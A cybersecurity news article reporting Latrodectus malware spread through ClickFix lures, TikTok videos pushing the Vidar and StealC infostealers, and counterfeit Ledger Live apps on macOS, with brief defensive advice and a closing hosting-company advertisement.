Hackers have recently adopted a new method to spread the malware known as Latrodectus through TikTok videos, employing the ClickFix technique. This method allows malware to execute in memory without being written to the disk, making it harder for security measures to detect or block it.

Latrodectus, a successor to IcedID, functions primarily as a downloader for other malicious payloads, including ransomware. It was first reported by Proofpoint and Team Cymru in April 2024. This new wave of attacks came shortly after a major crackdown, Operation Endgame, which targeted several cybercrime groups by taking down hundreds of servers and domains associated with various malware.

In May 2025, Expel observed users being tricked into executing a PowerShell command from a compromised website. This technique requires users to install a file through the MSIExec, executing it in memory to evade detection by antivirus software. The installer masquerades as a legitimate NVIDIA application, allowing a malicious DLL to be sideloaded and download the main payload.

To counter such attacks, experts recommend disabling the Windows Run feature using Group Policy Objects or modifying the registry to disable the "Windows + R" shortcut.

ClickFix and TikTok

In a related revelation, Trend Micro reported a campaign where TikTok videos—possibly created using AI—are used to distribute the Vidar and StealC infostealers. These videos encourage viewers to run harmful commands to activate popular software like Windows and Spotify. Accounts that posted these videos have since been deactivated, but the impact was significant, with some videos attracting nearly half a million views.

This approach not only builds on the ClickFix method but also directly targets users seeking pirated software activations. Security researcher Junestherry Dela Cruz highlighted that the attackers are leveraging trending social media platforms to socially engineer users into performing harmful actions.

Mac Users at Risk

Additionally, four malware campaigns utilizing counterfeit versions of the Ledger Live app have been discovered, which aim to steal sensitive cryptocurrency-related data, including seed phrases. These campaigns employ malicious DMG files that exfiltrate personal data, then prompt users for their seed phrases under false pretenses, enabling attackers to drain cryptocurrency wallets.

Moonlock Lab noted a significant rise in discussions on dark web forums related to anti-Ledger tactics, indicating that attackers are continually adapting their strategies to exploit users’ trust in legitimate applications.

As cyber threats evolve, it remains crucial for individuals and organizations to stay vigilant against these emerging tactics and implement robust security measures.

Welcome to DediRock, your trusted partner in high-performance hosting solutions. At DediRock, we specialize in providing dedicated servers, VPS hosting, and cloud services tailored to meet the unique needs of businesses and individuals alike. Our mission is to deliver reliable, scalable, and secure hosting solutions that empower our clients to achieve their digital goals. With a commitment to exceptional customer support, cutting-edge technology, and robust infrastructure, DediRock stands out as a leader in the hosting industry. Join us and experience the difference that dedicated service and unwavering reliability can make for your online presence. Launch our website.